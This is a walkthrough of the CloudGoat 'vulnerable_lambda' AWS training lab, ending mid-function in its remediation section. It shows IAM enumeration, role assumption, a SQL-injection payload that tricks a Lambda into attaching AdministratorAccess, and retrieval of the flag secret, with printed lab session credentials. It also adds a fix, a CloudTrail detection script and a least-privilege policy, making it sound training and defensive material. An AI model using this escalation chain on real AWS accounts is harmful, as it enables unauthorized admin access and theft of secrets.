Challenge URL

https://github.com/RhinoSecurityLabs/cloudgoat/blob/master/cloudgoat/scenarios/aws/vulnerable_lambda/README.md

CloudGoat is Rhino Security Labs' "Vulnerable by Design" AWS deployment tool.

Challenge description

1) You start as the 'bilbo' user.
2) You assume a role with more privileges.
3) You discover a Lambda function that applies policies to users.
4) You exploit a vulnerability in the function to escalate the privileges of the bilbo user in order to search for secrets.

(Screenshot: challenge description page)

Walkthrough

0. Environment setup

# ---------- 0. Environment setup ----------
cloudgoat create vulnerable_lambda --profile cloudgoat
cat start.txt
cloudgoat_output_aws_account_id = 739275444311
cloudgoat_output_bilbo_access_key_id = <bilbo_access_key_id>
cloudgoat_output_bilbo_secret_key = <bilbo_secret_key>
profile = cloudgoat
scenario_cg_id = cgid2bx1fsjdcs

### Create a profile with bilbo's keys (used below as vulnerable_lambda) ###
aws configure --profile vulnerable_lambda

1. Analyze current permissions

Analyzing the permissions we currently hold gives the results below.

From this we can see that a role switch is possible using sts:AssumeRole.

# ---------- 1. Analyze current permissions ----------
### List users ###
aws iam list-users --profile vulnerable_lambda | grep cgid2bx1fsjdcs
{
	"Path": "/",
	"UserName": "cg-bilbo-cgid2bx1fsjdcs",
	"UserId": "AIDA2YICACBL6J4VJJ5WY",
	"Arn": "arn:aws:iam::739275444311:user/cg-bilbo-cgid2bx1fsjdcs",
	"CreateDate": "2025-04-11T00:41:57Z"
}

### List groups ###
aws iam list-groups --profile vulnerable_lambda | grep cgid2bx1fsjdcs

### List policies ###
aws iam list-policies --profile vulnerable_lambda | grep cgid2bx1fsjdcs
aws iam list-policies --profile vulnerable_lambda | grep bilbo
aws iam list-policies --profile vulnerable_lambda | grep lambda

### AWS managed policies attached to <user> ###
aws iam list-attached-user-policies \
    --user-name cg-bilbo-cgid2bx1fsjdcs \
    --profile vulnerable_lambda
{
    "AttachedPolicies": []
}

### Inline policies attached to <user> ###
aws iam list-user-policies \
    --user-name cg-bilbo-cgid2bx1fsjdcs \
    --profile vulnerable_lambda
{
    "PolicyNames": [
        "cg-bilbo-cgid2bx1fsjdcs-standard-user-assumer"
    ]
}

### Inline policy attached to <user> (details) ###
aws iam get-user-policy \
    --policy-name cg-bilbo-cgid2bx1fsjdcs-standard-user-assumer \
    --user-name cg-bilbo-cgid2bx1fsjdcs \
    --profile vulnerable_lambda
{
    "UserName": "cg-bilbo-cgid2bx1fsjdcs",
    "PolicyName": "cg-bilbo-cgid2bx1fsjdcs-standard-user-assumer",
    "PolicyDocument": {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Action": "sts:AssumeRole",
                "Effect": "Allow",
                "Resource": "arn:aws:iam::940877411605:role/cg-lambda-invoker*",
                "Sid": ""
            },
            {
                "Action": [
                    "iam:Get*",
                    "iam:List*",
                    "iam:SimulateCustomPolicy",
                    "iam:SimulatePrincipalPolicy"
                ],
                "Effect": "Allow",
                "Resource": "*",
                "Sid": ""
            }
        ]
    }
}

### List roles ###
aws iam list-roles \
    --profile vulnerable_lambda | grep cgid2bx1fsjdcs
# Output
"RoleName": "cg-lambda-invoker-cgid2bx1fsjdcs",
"Arn": "arn:aws:iam::739275444311:role/cg-lambda-invoker-cgid2bx1fsjdcs",
"RoleName": "cgid2bx1fsjdcs-policy_applier_lambda1",
"Arn": "arn:aws:iam::739275444311:role/cgid2bx1fsjdcs-policy_applier_lambda1",

### Check role 1 ###
aws iam get-role \
    --role-name cg-lambda-invoker-cgid2bx1fsjdcs \
    --profile vulnerable_lambda
{
    "Role": {
        "Path": "/",
        "RoleName": "cg-lambda-invoker-cgid2bx1fsjdcs",
        "RoleId": "AROA2YICACBLWL3YA3LZU",
        "Arn": "arn:aws:iam::739275444311:role/cg-lambda-invoker-cgid2bx1fsjdcs",
        "CreateDate": "2025-04-11T00:42:13Z",
        "AssumeRolePolicyDocument": {
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Sid": "",
                    "Effect": "Allow",
                    "Principal": {
                        "AWS": "arn:aws:iam::739275444311:user/cg-bilbo-cgid2bx1fsjdcs"
                    },
                    "Action": "sts:AssumeRole"
                }
            ]
        },
        "MaxSessionDuration": 3600,
        "Tags": [
            {
                "Key": "Name",
                "Value": "cg-cgid2bx1fsjdcs"
            },
            {
                "Key": "Scenario",
                "Value": "vulnerable-lambda"
            },
            {
                "Key": "Stack",
                "Value": "CloudGoat"
            }
        ],
        "RoleLastUsed": {}
    }
}

### Managed policies attached to role 1 ###
aws iam list-attached-role-policies \
    --role-name cg-lambda-invoker-cgid2bx1fsjdcs \
    --profile vulnerable_lambda
{
    "AttachedPolicies": []
}

### Inline policies attached to role 1 (cg-lambda-invoker-cgid2bx1fsjdcs) ###
aws iam list-role-policies \
    --role-name cg-lambda-invoker-cgid2bx1fsjdcs \
    --profile vulnerable_lambda
{
    "PolicyNames": [
        "lambda-invoker"
    ]
}

### Role 1 policy details - lambda-invoker ###
aws iam get-role-policy \
    --role-name cg-lambda-invoker-cgid2bx1fsjdcs \
    --policy-name lambda-invoker \
    --profile vulnerable_lambda
{
    "RoleName": "cg-lambda-invoker-cgid2bx1fsjdcs",
    "PolicyName": "lambda-invoker",
    "PolicyDocument": {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Action": [
                    "lambda:ListFunctionEventInvokeConfigs",
                    "lambda:InvokeFunction",
                    "lambda:ListTags",
                    "lambda:GetFunction",
                    "lambda:GetPolicy"
                ],
                "Effect": "Allow",
                "Resource": "arn:aws:lambda:us-east-1:739275444311:function:cgid2bx1fsjdcs-policy_applier_lambda1"
            },
            {
                "Action": [
                    "lambda:ListFunctions",
                    "iam:Get*",
                    "iam:List*",
                    "iam:SimulateCustomPolicy",
                    "iam:SimulatePrincipalPolicy"
                ],
                "Effect": "Allow",
                "Resource": "*"
            }
        ]
    }
}


### Check role 2 ###
aws iam get-role \
    --role-name cgid2bx1fsjdcs-policy_applier_lambda1 \
    --profile vulnerable_lambda
{
    "Role": {
        "Path": "/",
        "RoleName": "cgid2bx1fsjdcs-policy_applier_lambda1",
        "RoleId": "AROA2YICACBLYTYJDP54S",
        "Arn": "arn:aws:iam::739275444311:role/cgid2bx1fsjdcs-policy_applier_lambda1",
        "CreateDate": "2025-04-11T00:41:58Z",
        "AssumeRolePolicyDocument": {
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Sid": "",
                    "Effect": "Allow",
                    "Principal": {
                        "Service": "lambda.amazonaws.com"
                    },
                    "Action": "sts:AssumeRole"
                }
            ]
        },
        "MaxSessionDuration": 3600,
        "Tags": [
            {
                "Key": "Name",
                "Value": "cg-cgid2bx1fsjdcs"
            },
            {
                "Key": "Scenario",
                "Value": "vulnerable-lambda"
            },
            {
                "Key": "Stack",
                "Value": "CloudGoat"
            }
        ],
        "RoleLastUsed": {}
    }
}

### Managed policies attached to role 2 ###
aws iam list-attached-role-policies \
    --role-name cgid2bx1fsjdcs-policy_applier_lambda1 \
    --profile vulnerable_lambda
{
    "AttachedPolicies": []
}


### Inline policies attached to role 2 (cgid2bx1fsjdcs-policy_applier_lambda1) ###
aws iam list-role-policies \
    --role-name cgid2bx1fsjdcs-policy_applier_lambda1 \
    --profile vulnerable_lambda
{
    "PolicyNames": [
        "policy_applier_lambda1"
    ]
}

### Role 2 policy details - policy_applier_lambda1 ###
aws iam get-role-policy \
    --role-name cgid2bx1fsjdcs-policy_applier_lambda1 \
    --policy-name policy_applier_lambda1 \
    --profile vulnerable_lambda
{
    "RoleName": "cgid2bx1fsjdcs-policy_applier_lambda1",
    "PolicyName": "policy_applier_lambda1",
    "PolicyDocument": {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Action": "iam:AttachUserPolicy",
                "Effect": "Allow",
                "Resource": "arn:aws:iam::739275444311:user/cg-bilbo-cgid2bx1fsjdcs"
            },
            {
                "Action": [
                    "logs:CreateLogStream",
                    "logs:PutLogEvents"
                ],
                "Effect": "Allow",
                "Resource": "arn:aws:logs:us-east-1:739275444311:log-group:/aws/lambda/cgid2bx1fsjdcs-policy_applier_lambda1:*"
            }
        ]
    }
}

### Assume the lambda-invoker role in account 940877411605 (the account named in bilbo's inline policy) ###
aws sts assume-role \
    --role-arn arn:aws:iam::940877411605:role/cg-lambda-invoker-cgid2bx1fsjdcs \
    --role-session-name Test1 \
    --profile vulnerable_lambda

# Output
An error occurred (AccessDenied) when calling the AssumeRole operation: User: arn:aws:iam::739275444311:user/cg-bilbo-cgid2bx1fsjdcs is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::940877411605:role/cg-lambda-invoker-cgid2bx1fsjdcs


### Assume the lambda-invoker role in our own account 739275444311 ###
# This succeeds even though the inline policy names a different account: the role's trust
# policy lists the bilbo user ARN directly, which is enough for a same-account AssumeRole.
aws sts assume-role \
    --role-arn arn:aws:iam::739275444311:role/cg-lambda-invoker-cgid2bx1fsjdcs \
    --role-session-name Test2 \
    --profile vulnerable_lambda
{
    "Credentials": {
        "AccessKeyId": "ASIA2YICACBL7GNYOXPD",
        "SecretAccessKey": "qZBOeg8tWlH30LHDm5UqNMLhEfvmzSaB8uQt+ZLm",
        "SessionToken": "IQoJb3JpZ2luX2VjEIb//////////wEaCXVzLWVhc3QtMSJGMEQCIHPto/rksY1wZFBikuujeYQpokzt7u9s7KCxyb/2byO4AiAtQoKRL/wCRVOOhNlBl7XPOHeGfBTI3sRfycYm0Cl92yqbAgj///////////8BEAAaDDczOTI3NTQ0NDMxMSIMskKlt7o5PVlnu0IiKu8BtwohQouZd/vQlBhf/Z+nUby15JnYgxXKWmhVL1QicDRJpkLtgkntAqmmLQuTyLRb/FHXp3BcwMRnuSmxCqxFVvmG6PI6QARwFLOvbGGxfGM8gFbzM5AiIQof4FmE6tpt5NUUHtJNK0sa1n4ow1iNoJiFtCYCLkAByWtk2ufBT251mepdTVDb6Xn5HqNn/M7EWKXxYSYfxL7Oi1TJgz+G9qDzOhg/lXWiwsiYMzaw8EWESURtWbnrTA1JjoGDbTVK7B35hjOnj1JgLrjEUkZ5HE40Ol2RH4HHyuhRYdD+RVHVWDG+R8RYyEUF1acc/yUwsLfyvwY6ngHLd96AOBzGFbMFAu020BVMSlJnhq8f4Dg/RQWj4HF3nfuCr+F6nZkwdeu0qvmPj8zC+74Gb+jVomxGo/WusMR4JOIQZLSNGBcxsTLLhEwgV3GZWUeUpfaLubPH8K2GjFr97nbw8Z0r5nkuzuz0VWDk/Og2bh+jQI2JxdSQ0Hbb3Jj0h5ERtaa4nY5cF4Cl4D9pE7QfsZgq5qdW2JyUTg==",
        "Expiration": "2025-04-14T06:22:56+00:00"
    },
    "AssumedRoleUser": {
        "AssumedRoleId": "AROA2YICACBL6YEKWBZRX:Test2",
        "Arn": "arn:aws:sts::739275444311:assumed-role/cg-lambda-invoker-cgid2bx1fsjdcs/Test2"
    }
}

 

 

 

2. Access Lambda after assuming the role

Access Lambda using the permissions obtained from the role switch.

### Create a new profile for the assumed-role credentials (named lambda-invoker below) ###
aws configure set --profile <profile_name> aws_access_key_id <aws_access_key_id>
aws configure set --profile <profile_name> aws_secret_access_key <aws_secret_access_key>
aws configure set --profile <profile_name> aws_session_token <aws_session_token>

### List Lambda functions ###
aws lambda list-functions \
    --profile lambda-invoker
{
    "Functions": [
        {
            "FunctionName": "cgid2bx1fsjdcs-policy_applier_lambda1",
            "FunctionArn": "arn:aws:lambda:us-east-1:739275444311:function:cgid2bx1fsjdcs-policy_applier_lambda1",
            "Runtime": "python3.9",
            "Role": "arn:aws:iam::739275444311:role/cgid2bx1fsjdcs-policy_applier_lambda1",
            "Handler": "main.handler",
            "CodeSize": 1515773,
            "Description": "This function will apply a managed policy to the user of your choice, so long as the database says that it's okay...",
            "Timeout": 3,
            "MemorySize": 128,
            "LastModified": "2025-04-12T01:50:08.735+0000",
            "CodeSha256": "WrQlXmLzMDqjmFLHc5bkjmjlARW/PgzS7RGeW85WbDI=",
            "Version": "$LATEST",
            "TracingConfig": {
                "Mode": "PassThrough"
            },
            "RevisionId": "eb170973-7b56-48e3-b98b-1025686048aa",
            "PackageType": "Zip",
            "Architectures": [
                "x86_64"
            ],
            "EphemeralStorage": {
                "Size": 512
            },
            "SnapStart": {
                "ApplyOn": "None",
                "OptimizationStatus": "Off"
            },
            "LoggingConfig": {
                "LogFormat": "Text",
                "LogGroup": "/aws/lambda/cgid2bx1fsjdcs-policy_applier_lambda1"
            }
        }
    ]
}


### Get the Lambda function (code location) to learn how it is called ###
aws lambda get-function \
    --function-name cgid2bx1fsjdcs-policy_applier_lambda1 \
    --profile lambda-invoker
{
    "Configuration": {
        "FunctionName": "cgid2bx1fsjdcs-policy_applier_lambda1",
        "FunctionArn": "arn:aws:lambda:us-east-1:739275444311:function:cgid2bx1fsjdcs-policy_applier_lambda1",
        "Runtime": "python3.9",
        "Role": "arn:aws:iam::739275444311:role/cgid2bx1fsjdcs-policy_applier_lambda1",
        "Handler": "main.handler",
        "CodeSize": 1515773,
        "Description": "This function will apply a managed policy to the user of your choice, so long as the database says that it's okay...",
        "Timeout": 3,
        "MemorySize": 128,
        "LastModified": "2025-04-12T01:50:08.735+0000",
        "CodeSha256": "WrQlXmLzMDqjmFLHc5bkjmjlARW/PgzS7RGeW85WbDI=",
        "Version": "$LATEST",
        "TracingConfig": {
            "Mode": "PassThrough"
        },
        "RevisionId": "eb170973-7b56-48e3-b98b-1025686048aa",
        "State": "Active",
        "LastUpdateStatus": "Successful",
        "PackageType": "Zip",
        "Architectures": [
            "x86_64"
        ],
        "EphemeralStorage": {
            "Size": 512
        },
        "SnapStart": {
            "ApplyOn": "None",
            "OptimizationStatus": "Off"
        },
        "RuntimeVersionConfig": {
            "RuntimeVersionArn": "arn:aws:lambda:us-east-1::runtime:d6dc717114b06da7d4b5a2df328222709ec4fad2853004fac301b8b63a65c084"
        },
        "LoggingConfig": {
            "LogFormat": "Text",
            "LogGroup": "/aws/lambda/cgid2bx1fsjdcs-policy_applier_lambda1"
        }
    },
    "Code": {
        "RepositoryType": "S3",
        "Location": "https://prod-04-2014-tasks.s3.us-east-1.amazonaws.com/snapshots/739275444311/cgid2bx1fsjdcs-policy_applier_lambda1-80679360-e210-4a9c-a160-1b22dfdaf277?versionId=GhMhCfHgv3dlzPmVNK_Fi.JklcCM7.d8&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEH0aCXVzLWVhc3QtMSJIMEYCIQD9JwRHHBfqLsF7WOfGbpiLhTLzHsPtMIIA%2F8fGPL048QIhAPR%2Ft1GJNJNrq8GAKVzZQwjg7ECS043ECOABGPjiT0PHKpICCPX%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMNzQ5Njc4OTAyODM5IgxckJ1oMMvZW2Tp81Aq5gF2i5rKd4OuzuVcrcAm4IThkIh0EHpwGQiRvn1J7OpQyyUTZgxmo%2BgA0dTQcJA%2BaJAzVmuxiJwaTcwoHekXT%2FPVf9nDJ%2BE7aSQUovIXVoOWWAu3HI0yGtWH6sERb7rWbquGH63ltf%2Fi%2BJ3C6Krfe%2FOEzDwRqBhuwjIIIyJsW7cVza8KXAccj6H10PBvFZhQdTnqN0tgG0xkl3DDtmkm1%2FgapLgNsAxApvdUY0faR4R0%2BXZKi%2BQ0meZ2ky5Kn7SVN9iaOuxyiBDY3Np88ZwjC0Ni7u2CpZHuS6uiLi0E0VyMVJxJJ1rY2DDks%2FC%2FBjqOAfDa5qe%2FENuInbaTDGtTffXKK4nkem1GH9233Hrd%2FijG6xXDpmTrPBcz46qPn%2FJrZ9DBFZppFpRnI8%2BjY9zyDb2EQwaqXm4sZRvfSz4yw6hS8%2F99yFXkDC8PkcuKIN6HnlomHlnJDY7THjzhnxLF5AR3WnsgEfLDnSADTIkpAwqYwJZm88rtY52L0NjYEjM%3D&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20250414T052331Z&X-Amz-SignedHeaders=host&X-Amz-Expires=600&X-Amz-Credential=ASIA25DCYHY32XA3KBKX%2F20250414%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Signature=32989a15d4ffe57a59b46404cc27ffa545ce02ff7bc6327a8f8f0685ec7ca47f"
    },
    "Tags": {
        "Name": "cg-cgid2bx1fsjdcs",
        "Scenario": "vulnerable-lambda",
        "Stack": "CloudGoat"
    }
}

 

 

 

3. Analyze the Lambda code

We analyze the main.py source code and go after the vulnerability in it.

# main.py

import boto3
from sqlite_utils import Database

db = Database("my_database.db")
iam_client = boto3.client('iam')


# db["policies"].insert_all([
#     {"policy_name": "AmazonSNSReadOnlyAccess", "public": 'True'}, 
#     {"policy_name": "AmazonRDSReadOnlyAccess", "public": 'True'},
#     {"policy_name": "AWSLambda_ReadOnlyAccess", "public": 'True'},
#     {"policy_name": "AmazonS3ReadOnlyAccess", "public": 'True'},
#     {"policy_name": "AmazonGlacierReadOnlyAccess", "public": 'True'},
#     {"policy_name": "AmazonRoute53DomainsReadOnlyAccess", "public": 'True'},
#     {"policy_name": "AdministratorAccess", "public": 'False'}
# ])


def handler(event, context):
    target_policys = event['policy_names']
    user_name = event['user_name']
    print(f"target policys are : {target_policys}")

    for policy in target_policys:
        statement_returns_valid_policy = False
        # Vulnerable: the caller-controlled policy name is interpolated straight into the SQL
        # text, so a value that closes the quote and starts a "--" comment drops the
        # public='True' check. A parameterized query would bind the name as data instead.
        statement = f"select policy_name from policies where policy_name='{policy}' and public='True'"
        for row in db.query(statement):
            statement_returns_valid_policy = True
            print(f"applying {row['policy_name']} to {user_name}")
            # The execution role holds iam:AttachUserPolicy on the bilbo user, so every row
            # the query returns is attached to that user as an AWS managed policy.
            response = iam_client.attach_user_policy(
                UserName=user_name,
                PolicyArn=f"arn:aws:iam::aws:policy/{row['policy_name']}"
            )
            print("result: " + str(response['ResponseMetadata']['HTTPStatusCode']))

        if not statement_returns_valid_policy:
            invalid_policy_statement = f"{policy} is not an approved policy, please only choose from approved " \
                                       f"policies and don't cheat. :) "
            print(invalid_policy_statement)
            return invalid_policy_statement

    return "All managed policies were applied as expected."


if __name__ == "__main__":
    payload = {
        "policy_names": [
            "AmazonSNSReadOnlyAccess",
            "AWSLambda_ReadOnlyAccess"
        ],
        "user_name": "cg-bilbo-user"
    }
    print(handler(payload, 'uselessinfo'))
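The following is an added example, not CloudGoat's code: the policy lookup from main.py in its vulnerable form next to a hardened form, run against a constructed in-memory SQLite table with the same rows as the commented-out insert_all above. The stdlib sqlite3 module stands in for sqlite_utils, the IAM call is replaced by an attach callback so it runs offline, and the names make_db, lookup_vulnerable, lookup_safe, handler_hardened and _POLICY_NAME_RE are mine.

```python
"""Vulnerable vs. hardened policy lookup for the policy-applier Lambda (added example)."""
import re
import sqlite3

# Constructed seed data: the scenario's "policies" table from main.py.
_SEED = [
    ("AmazonSNSReadOnlyAccess", "True"),
    ("AmazonRDSReadOnlyAccess", "True"),
    ("AWSLambda_ReadOnlyAccess", "True"),
    ("AmazonS3ReadOnlyAccess", "True"),
    ("AmazonGlacierReadOnlyAccess", "True"),
    ("AmazonRoute53DomainsReadOnlyAccess", "True"),
    ("AdministratorAccess", "False"),
]


def make_db():
    """In-memory stand-in for my_database.db."""
    db = sqlite3.connect(":memory:")
    db.execute("create table policies (policy_name text, public text)")
    db.executemany("insert into policies values (?, ?)", _SEED)
    return db


def lookup_vulnerable(db, policy):
    """Mirrors main.py: the caller's string becomes part of the SQL text."""
    statement = f"select policy_name from policies where policy_name='{policy}' and public='True'"
    return [row[0] for row in db.execute(statement)]


# Managed policy names only use this character set; anything else is rejected
# before it reaches the database or IAM (assumed allow-list, stricter than IAM's own).
_POLICY_NAME_RE = re.compile(r"^[A-Za-z0-9_+=,.@-]{1,128}$")


def lookup_safe(db, policy):
    """Parameterized query: the name is bound as data and never parsed as SQL."""
    if not _POLICY_NAME_RE.fullmatch(policy):
        return []
    statement = "select policy_name from policies where policy_name=? and public='True'"
    return [row[0] for row in db.execute(statement, (policy,))]


def handler_hardened(event, db, attach):
    """Hardened handler. attach(user_name, policy_arn) is only called for rows the
    parameterized query returns; the first unapproved name aborts the request."""
    user_name = event["user_name"]
    applied = []
    for policy in event["policy_names"]:
        rows = lookup_safe(db, policy)
        if not rows:
            return {"applied": applied, "error": f"{policy} is not an approved policy"}
        for name in rows:
            attach(user_name, f"arn:aws:iam::aws:policy/{name}")
            applied.append(name)
    return {"applied": applied, "error": None}


if __name__ == "__main__":
    conn = make_db()
    probe = "AdministratorAccess' -- "
    print("vulnerable:", lookup_vulnerable(conn, probe))   # AdministratorAccess leaks through
    print("hardened:  ", lookup_safe(conn, probe))         # nothing returned
```

The regex check is defense in depth: the parameterized query alone already stops the injection, but rejecting names outside the IAM character set also keeps malformed input from ever reaching attach_user_policy.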

 

 

4. Retrieve the secret after the exploit

In payload.json, close the quoted string after AdministratorAccess and comment out the rest of the query (the public='True' check) to bypass the validation, then invoke the Lambda function.

### Add permissions to the bilbo user ###
# payload.json
{"policy_names": ["AdministratorAccess' -- "], "user_name": "cg-bilbo-cgid2bx1fsjdcs"}

### Invoke the Lambda function ###
aws lambda invoke \
    --function-name cgid2bx1fsjdcs-policy_applier_lambda1 \
    --cli-binary-format raw-in-base64-out \
    --payload file://payload.json \
    response.json \
    --profile lambda-invoker

### AWS managed policies attached to <user> (after the invocation) ###
aws iam list-attached-user-policies \
    --user-name cg-bilbo-cgid2bx1fsjdcs \
    --profile vulnerable_lambda
{
    "AttachedPolicies": [
        {
            "PolicyName": "AmazonSNSReadOnlyAccess",
            "PolicyArn": "arn:aws:iam::aws:policy/AmazonSNSReadOnlyAccess"
        },
        {
            "PolicyName": "AdministratorAccess",
            "PolicyArn": "arn:aws:iam::aws:policy/AdministratorAccess"
        },
        {
            "PolicyName": "AmazonGlacierReadOnlyAccess",
            "PolicyArn": "arn:aws:iam::aws:policy/AmazonGlacierReadOnlyAccess"
        },
        {
            "PolicyName": "AmazonRDSReadOnlyAccess",
            "PolicyArn": "arn:aws:iam::aws:policy/AmazonRDSReadOnlyAccess"
        },
        {
            "PolicyName": "AmazonS3ReadOnlyAccess",
            "PolicyArn": "arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess"
        },
        {
            "PolicyName": "AmazonRoute53DomainsReadOnlyAccess",
            "PolicyArn": "arn:aws:iam::aws:policy/AmazonRoute53DomainsReadOnlyAccess"
        },
        {
            "PolicyName": "AWSLambda_ReadOnlyAccess",
            "PolicyArn": "arn:aws:iam::aws:policy/AWSLambda_ReadOnlyAccess"
        }
    ]
}


### List secrets ###
aws secretsmanager list-secrets \
    --profile vulnerable_lambda
{
    "SecretList": [
        {
            "ARN": "arn:aws:secretsmanager:us-east-1:739275444311:secret:cgid2bx1fsjdcs-final_flag-paxlge",
            "Name": "cgid2bx1fsjdcs-final_flag",
            "LastChangedDate": "2025-04-12T10:50:01.736000+09:00",
            "LastAccessedDate": "2025-04-12T09:00:00+09:00",
            "Tags": [
                {
                    "Key": "Name",
                    "Value": "cg-cgid2bx1fsjdcs"
                },
                {
                    "Key": "Scenario",
                    "Value": "vulnerable-lambda"
                },
                {
                    "Key": "Stack",
                    "Value": "CloudGoat"
                }
            ],
            "SecretVersionsToStages": {
                "terraform-20250412015001367600000002": [
                    "AWSCURRENT"
                ]
            },
            "CreatedDate": "2025-04-12T10:49:59.853000+09:00"
        }
    ]
}

### Read the secret ###
aws secretsmanager get-secret-value \
    --secret-id cgid2bx1fsjdcs-final_flag \
    --profile vulnerable_lambda
{
    "ARN": "arn:aws:secretsmanager:us-east-1:739275444311:secret:cgid2bx1fsjdcs-final_flag-paxlge",
    "Name": "cgid2bx1fsjdcs-final_flag",
    "VersionId": "terraform-20250412015001367600000002",
    "SecretString": "cg-secret-846237-284529",
    "VersionStages": [
        "AWSCURRENT"
    ],
    "CreatedDate": "2025-04-12T10:50:01.732000+09:00"
}
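From the defender's side, the escalation above leaves a clear trace: the Lambda's execution role calls iam:AttachUserPolicy with AdministratorAccess. The following is an added example, not part of the original post, of detection logic run over constructed CloudTrail-style records. The records are hand-written samples in the field layout CloudTrail uses for IAM events (eventSource, eventName, userIdentity with sessionContext.sessionIssuer, requestParameters); the account id and names are the scenario's, and the functions find_sensitive_attachments, scan_jsonl and caller_of are mine.

```python
"""Flag attachments of high-privilege managed policies in CloudTrail records (added example)."""
import json

LAMBDA_ROLE = "arn:aws:iam::739275444311:role/cgid2bx1fsjdcs-policy_applier_lambda1"
ADMIN_USER = {"type": "IAMUser", "arn": "arn:aws:iam::739275444311:user/admin"}

# Managed policies whose attachment should always be reviewed (assumed list).
SENSITIVE_POLICY_ARNS = frozenset({
    "arn:aws:iam::aws:policy/AdministratorAccess",
    "arn:aws:iam::aws:policy/IAMFullAccess",
    "arn:aws:iam::aws:policy/PowerUserAccess",
})
ATTACH_EVENTS = frozenset({"AttachUserPolicy", "AttachRolePolicy", "AttachGroupPolicy"})


def _assumed_role(role_arn, session):
    """Build the userIdentity block CloudTrail records for an assumed-role session."""
    account, role_name = role_arn.split(":")[4], role_arn.rsplit("/", 1)[1]
    return {"type": "AssumedRole",
            "arn": f"arn:aws:sts::{account}:assumed-role/{role_name}/{session}",
            "sessionContext": {"sessionIssuer": {"type": "Role", "arn": role_arn}}}


def _iam_event(time, name, identity, params):
    return {"eventTime": time, "eventSource": "iam.amazonaws.com", "eventName": name,
            "userIdentity": identity, "requestParameters": params}


# Constructed sample log: a benign read-only attachment by the Lambda, the
# escalation, the same policy attached by a human admin, and an unrelated call.
SAMPLE_EVENTS = [
    _iam_event("2025-04-14T05:30:01Z", "AttachUserPolicy",
               _assumed_role(LAMBDA_ROLE, "cgid2bx1fsjdcs-policy_applier_lambda1"),
               {"userName": "cg-bilbo-cgid2bx1fsjdcs",
                "policyArn": "arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess"}),
    _iam_event("2025-04-14T05:31:12Z", "AttachUserPolicy",
               _assumed_role(LAMBDA_ROLE, "cgid2bx1fsjdcs-policy_applier_lambda1"),
               {"userName": "cg-bilbo-cgid2bx1fsjdcs",
                "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"}),
    _iam_event("2025-04-14T06:02:45Z", "AttachUserPolicy", ADMIN_USER,
               {"userName": "ops-user", "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"}),
    _iam_event("2025-04-14T06:03:00Z", "ListUsers", ADMIN_USER, None),
]
SAMPLE_JSONL = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)


def caller_of(event):
    """Return (principal ARN, issuing role ARN or None) for attribution."""
    ident = event.get("userIdentity") or {}
    issuer = ((ident.get("sessionContext") or {}).get("sessionIssuer") or {}).get("arn")
    return ident.get("arn", "unknown"), issuer


def find_sensitive_attachments(events, sensitive_arns=SENSITIVE_POLICY_ARNS,
                               lambda_role_arns=frozenset({LAMBDA_ROLE})):
    """Alert on the policy ARN, not the API name: the Lambda role legitimately calls
    AttachUserPolicy, so only privileged policies are findings. via_lambda_role marks
    findings that came through the function's execution role."""
    findings = []
    for ev in events:
        if ev.get("eventSource") != "iam.amazonaws.com" or ev.get("eventName") not in ATTACH_EVENTS:
            continue
        params = ev.get("requestParameters") or {}
        policy_arn = params.get("policyArn")
        if policy_arn not in sensitive_arns:
            continue
        principal, issuer = caller_of(ev)
        findings.append({
            "eventTime": ev.get("eventTime"),
            "eventName": ev["eventName"],
            "caller": principal,
            "target": params.get("userName") or params.get("roleName") or params.get("groupName"),
            "policyArn": policy_arn,
            "via_lambda_role": issuer in lambda_role_arns,
        })
    return findings


def scan_jsonl(text):
    """Parse one CloudTrail record per line and return the findings."""
    return find_sensitive_attachments(json.loads(line) for line in text.splitlines() if line.strip())


if __name__ == "__main__":
    for f in scan_jsonl(SAMPLE_JSONL):
        print(json.dumps(f))
```

In a real deployment the same function would run over CloudTrail records delivered to S3 or CloudWatch Logs; a finding with via_lambda_role set is the signal that the policy applier itself was abused rather than an administrator acting directly.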

 

 

Security remediation

1. Minimize the Lambda function's permissions
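One concrete form of this remediation, as an added example that is not CloudGoat's code: an execution-role policy for the policy applier that allows iam:AttachUserPolicy on the bilbo user only for the approved read-only managed policies, using the IAM condition key iam:PolicyARN. With this in place the SQL injection above still returns the AdministratorAccess row, but the attach call is denied by IAM. The evaluator attach_allowed is a deliberately simplified check (exact string matching, Allow statements only, no wildcards or explicit Deny) that shows which requests the condition admits; it is not an IAM policy simulator, and the names build_execution_role_policy, attach_allowed and APPROVED_POLICIES are mine.

```python
"""Least-privilege execution-role policy for the policy-applier Lambda (added example)."""
import json

# The six policies the scenario's database marks public='True'.
APPROVED_POLICIES = [
    "AmazonSNSReadOnlyAccess",
    "AmazonRDSReadOnlyAccess",
    "AWSLambda_ReadOnlyAccess",
    "AmazonS3ReadOnlyAccess",
    "AmazonGlacierReadOnlyAccess",
    "AmazonRoute53DomainsReadOnlyAccess",
]


def build_execution_role_policy(account_id, user_name, function_name, approved):
    """Return the inline policy document for the Lambda's execution role.

    Compared with the scenario's policy_applier_lambda1 policy, the attach
    permission carries an iam:PolicyARN condition, so even a bypass of the
    application-level check cannot attach a policy outside the approved list."""
    return {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Sid": "AttachOnlyApprovedPolicies",
                "Effect": "Allow",
                "Action": "iam:AttachUserPolicy",
                "Resource": f"arn:aws:iam::{account_id}:user/{user_name}",
                "Condition": {
                    "ArnEquals": {
                        "iam:PolicyARN": [f"arn:aws:iam::aws:policy/{n}" for n in approved]
                    }
                },
            },
            {
                "Sid": "FunctionLogging",
                "Effect": "Allow",
                "Action": ["logs:CreateLogStream", "logs:PutLogEvents"],
                "Resource": f"arn:aws:logs:us-east-1:{account_id}:log-group:/aws/lambda/{function_name}:*",
            },
        ],
    }


def _as_list(value):
    return value if isinstance(value, list) else [value]


def attach_allowed(policy_doc, user_arn, policy_arn):
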